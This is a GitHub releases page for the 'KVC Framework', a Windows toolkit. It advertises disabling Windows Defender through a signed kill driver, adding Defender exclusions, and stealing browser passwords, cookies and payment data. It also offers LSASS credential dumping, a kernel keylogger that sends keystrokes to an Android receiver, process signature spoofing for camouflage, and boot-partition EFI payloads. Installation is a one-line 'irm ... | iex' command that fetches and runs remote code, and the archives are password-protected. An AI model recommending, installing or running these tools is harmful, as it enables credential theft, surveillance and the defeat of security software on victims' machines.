Releases: wesmar/kvc
KVC Framework - Release 03.05.2026
🔐 PASSWORD: github.com
Extract downloaded release with password: github.com
📦 ARCHIVE CONTENTS (kvc.7z — 2.5M)
kvc-latest/
│
├── kvc.exe ⭐ Main KVC Framework executable (REQUIRED) [1.3M]
├── kvc.dat ⭐ Encrypted PassExtractor module (OPTIONAL) [740K]
│ Required for: Chrome, Edge, Brave passwords + cookies
├── README.txt 📄 Installation guide
│
└── other-tools/ 🔧 Development & Research Tools (OPTIONAL)
│
├── encoding-tools/ 📦 Framework Build Pipeline
│ ├── implementer.exe - Steganographic icon builder
│ ├── KvcXor.exe - Resource encoder/decoder
│ ├── kvc.ini - Icon builder configuration
│ ├── kvc.sys - Kernel driver component
│ ├── kvcstrm.sys - OmniDriver kernel primitive
│ ├── kvckiller.sys - Digitally signed kill driver (PP/PPL bypass, no HVCI restart)
│ ├── ExplorerFrame.dll - System DLL (with U+200B hijack char)
│ ├── kvc_orig.ico - Original icon template
│ ├── kvc.ico - Built steganographic icon
│ ├── kvc_pass.exe - Password extractor binary
│ └── kvc_crypt.dll - Encryption / injection library
│
└── keylogger-kit/ ⌨️ Kernel Keylogger Research Tools
├── UdpLogger.apk - Android UDP receiver (1.47 MB)
├── kvckbd.sys - Keyboard hook driver (14 KB)
├── kvckbd.bat - Automated deployment script
├── kvckbd_split.c - Driver source code (79 KB)
├── OmniDriver.sys - Universal kernel access (13 KB)
├── MainActivity.kt - Android app source
└── UdpLoggerService.kt - Android service source
🔗 DOWNLOAD LINKS
| File | Size | Description |
|---|---|---|
| kvc.7z | 2.5M | Main archive (password: github.com) |
| kvc.enc | 2.0M | Deployment package (used by irm installer) |
| kvcforensic.dat | 644K | Forensic module — LSASS minidump credential extraction (kvc analyze) |
| UnderVolter.dat | 176K | EFI undervolting module (kvc undervolter deploy) |
| run | — | PowerShell one-command installer |
🚀 QUICK INSTALLATION
One-Line Remote Install:
irm https://github.com/wesmar/kvc/releases/download/latest/run | iexDownloads kvc.exe + kvc.dat, runs kvc setup automatically.
Mirror:
irm https://kvc.pl/run | iexManual:
- Download
kvc.7z, extract with passwordgithub.com - Open elevated Command Prompt (Run as Administrator)
- Run:
kvc setup
✅ WHAT'S NEW — 03.05.2026
kvckiller.sys — digitally signed kill driver — New kernel driver added to
the resource bundle (service: wsftprm, device: .\Warsaw_PM). Carries a valid
digital signature — loads without DSE bypass, without HVCI restart, without any
unsigned-driver prerequisites. Terminates any process regardless of PP/PPL level
via IOCTL 0x22201C. Replaces kvcstrm as the PP/PPL kill primitive.
secengine disable — no restart, three targets — kvc secengine disable
now kills MsMpEng.exe and SecurityHealthSystray.exe via kvckiller IOCTL, stops
SecurityHealthService via SCM stop, and sets IFEO Debugger=systray.exe on all
three targets. Fully restart-free on every system. --restart flag removed.
secengine enable — now also explicitly starts SecurityHealthService via SCM
in addition to WinDefend.
kvc kill — kvckiller fallback — kvcstrm replaced by kvckiller as the PP/PPL
fallback when kvc.sys primary kill fails. Exe path cached via
QueryFullProcessImageNameW at kill time (HKCU\Software\kvc\KilledPaths).
kvc restore — process relaunch — kvc restore <name> now falls back to
relaunching the killed process when no saved PPL state exists: SCM service scan
by ImagePath first, then ShellExecuteEx with the path cached at kill time.
Example: kvc kill msmpeng then kvc restore msmpeng brings MsMpEng back.
IFEO hive path fix — hive file now correctly lands at
C:\Windows\Temp\Ifeo.hiv (was C:\Windows\TempIfeo.hiv due to missing
backslash). CLFS transaction log cleanup extended to cover .TM.blf and
.TMContainer*.regtrans-ms files via parent-dir prefix scan.
📋 AUTOMATIC SETUP PROCESS (kvc setup)
- Moves
kvc.exetoC:\Windows\System32 - Adds Windows Defender exclusions automatically
- Extracts kernel driver from steganographic icon resource
- Deploys PassExtractor if
kvc.datis present:- Decrypts and splits
kvc.dat→kvc_pass.exe+kvc_crypt.dll - Writes both to
C:\Windows\System32
- Decrypts and splits
- Full browser extraction (Chrome, Edge, Brave) available immediately
🎯 kvc.dat — PassExtractor Module
- Required for: Chrome, Edge, Brave — passwords, cookies, payment data
- Deployment: Automatic via
kvc setupor theirmone-liner - Without kvc.dat: Edge-only DPAPI password fallback (no cookies)
- Browsers: Chrome, Microsoft Edge, Brave Browser
- No browser close required: network-service kill + COM elevation
📞 CONTACT & SUPPORT
- Email: marek@wesolowski.eu.org
- Website: https://kvc.pl
- GitHub: https://github.com/wesmar/kvc
⚖️ LEGAL DISCLAIMER
For educational and authorized security testing purposes only.
Unauthorized access to computer systems is illegal.
The author assumes no liability for misuse.
Release Date: 03.05.2026
© WESMAR 2026
KVC Framework v1.0.1 - Release 04.04.2026
KVC Framework v1.0.1 - Release 04.04.2026
🔐 PASSWORD: github.com
Extract downloaded release with password: github.com
📦 ARCHIVE CONTENTS (kvc.7z — 3.1M)
kvc-v1.0.1/
│
├── kvc.exe ⭐ Main KVC Framework executable (REQUIRED) [1.1M]
├── kvc.dat ⭐ Encrypted PassExtractor module (OPTIONAL) [740K]
│ Required for: Chrome, Edge, Brave — passwords + cookies
├── README.txt 📄 Installation guide
│
└── other-tools/ 🔧 Development & Research Tools (OPTIONAL)
│
├── encoding-tools/ 📦 Framework Build Pipeline
│ ├── implementer.exe - Steganographic icon builder
│ ├── KvcXor.exe - Resource encoder/decoder
│ ├── kvc.ini - Icon builder configuration
│ ├── kvc.sys - Kernel driver component
│ ├── ExplorerFrame.dll - System DLL (with U+200B hijack char)
│ ├── kvc_orig.ico - Original icon template
│ ├── kvc.ico - Built steganographic icon
│ ├── kvc_pass.exe - Password extractor binary
│ └── kvc_crypt.dll - Encryption / injection library
│
├── undervolter/ 🔋 EFI Undervolting Module
│ ├── UnderVolter.dat - Encrypted EFI payload → deploy with: kvc undervolter deploy
│ ├── Loader.efi - UEFI loader (replaces BOOTX64.EFI in mode A)
│ ├── UnderVolter.efi - Main EFI application (voltage/power MSR writes)
│ └── UnderVolter.ini - Per-CPU profile (Intel 2nd–15th gen, auto-selected by CPUID)
│
└── keylogger-kit/ ⌨️ Kernel Keylogger Research Tools
├── UdpLogger.apk - Android UDP receiver (1.47 MB)
├── kvckbd.sys - Keyboard hook driver (14 KB)
├── kvckbd.bat - Automated deployment script
├── kvckbd_split.c - Driver source code (79 KB)
├── OmniDriver.sys - Universal kernel access (13 KB)
├── MainActivity.kt - Android app source
└── UdpLoggerService.kt - Android service source
🔗 DOWNLOAD LINKS
| File | Size | Description |
|---|---|---|
| kvc.7z | 3.1M | Main archive (password: github.com) |
| kvc.enc | 1.9M | Deployment package (used by irm installer) |
| run | — | PowerShell one-command installer |
🚀 QUICK INSTALLATION
One-Line Remote Install:
irm https://github.com/wesmar/kvc/releases/download/v1.0.1/run | iexDownloads kvc.exe + kvc.dat, runs kvc setup automatically.
Mirror:
irm https://kvc.pl/run | iexManual:
- Download
kvc.7z, extract with passwordgithub.com - Open elevated Command Prompt (Run as Administrator)
- Run:
kvc setup
✅ WHAT'S NEW — 04.04.2026
Process Signature Spoofing (Full Camouflage) — Added the ability to spoof
cryptographic signature levels (SignatureLevel and SectionSignatureLevel)
within the EPROCESS structure. When applying protection via kvc protect
or kvc set (e.g., PPL-Antimalware), KVC automatically calculates and
applies optimal signature levels (e.g., 0x37 / 0x07). The process becomes
indistinguishable from legitimate protected binaries (like MsMpEng.exe) even
under deep kernel inspection. Manual control via:
kvc spoof <PID|name> <ExeSigHex> <DllSigHex> — allows surgical manipulation
of signature bytes to mimic any Windows component (including Kernel/System
signatures like 0x1E / 0x1C).
Browser extraction without closing — Chrome, Edge, and Brave passwords,
cookies, and payment data are extracted while the browser is running.
The orchestrator kills only the browser's network-service subprocess (which
holds database file locks), not the browser itself. For Edge, a second
network-service kill is issued right before the DLL opens the database,
compensating for Edge restarting its network service faster than Chrome.
COM Elevation for Edge — Edge master key decryption now uses
IEdgeElevatorFinal (CLSID {1FCBE96C-1697-43AF-9140-2897C7C69767})
for all data types including passwords. DPAPI is used as fallback only.
Previous split-key strategy (DPAPI for passwords, COM for cookies) removed.
kvc.dat covers Chrome AND Edge — kvc.dat deploys both kvc_pass.exe
and kvc_crypt.dll to System32. Required for full extraction (passwords +
cookies + payments) from all Chromium-based browsers.
Legacy CPU support — no AVX/YMM instructions. Works on 3rd-gen Intel
Core and older (SSE2 only). Verified with dumpbin /disasm | findstr ymm.
Static CRT — kvc_pass.exe and kvc_crypt.dll link C++ runtime
statically (/MT). No vcruntime140.dll dependency.
UnderVolter — EFI undervolting module — kvc undervolter deploy writes
a custom UEFI application to the EFI System Partition. On boot it applies
Intel voltage/power-limit offsets via MSR writes before the Windows kernel
loads. ESP is accessed via GPT partition GUID using FindFirstVolume +
IOCTL_DISK_GET_PARTITION_INFO_EX — no drive-letter assignment or mountvol.
Supports Intel 2nd–15th gen (Sandy Bridge → Arrow Lake); profile selected
automatically by CPUID at boot. Build: KvcXor.exe option 6 packs
Loader.efi + UnderVolter.efi + UnderVolter.ini → UnderVolter.dat.
Full docs and source: https://kvc.pl/repositories/undervolter
📋 AUTOMATIC SETUP PROCESS (kvc setup)
- Moves
kvc.exetoC:\Windows\System32 - Adds Windows Defender exclusions automatically
- Extracts kernel driver from steganographic icon resource
- Deploys PassExtractor if
kvc.datis present:- Decrypts and splits
kvc.dat→kvc_pass.exe+kvc_crypt.dll - Writes both to
C:\Windows\System32
- Decrypts and splits
- Full browser extraction (Chrome, Edge, Brave) available immediately
📞 CONTACT & SUPPORT
- Email: marek@wesolowski.eu.org
- Website: https://kvc.pl
- GitHub: https://github.com/wesmar/kvc
Release Date: 04.04.2026
© WESMAR 2026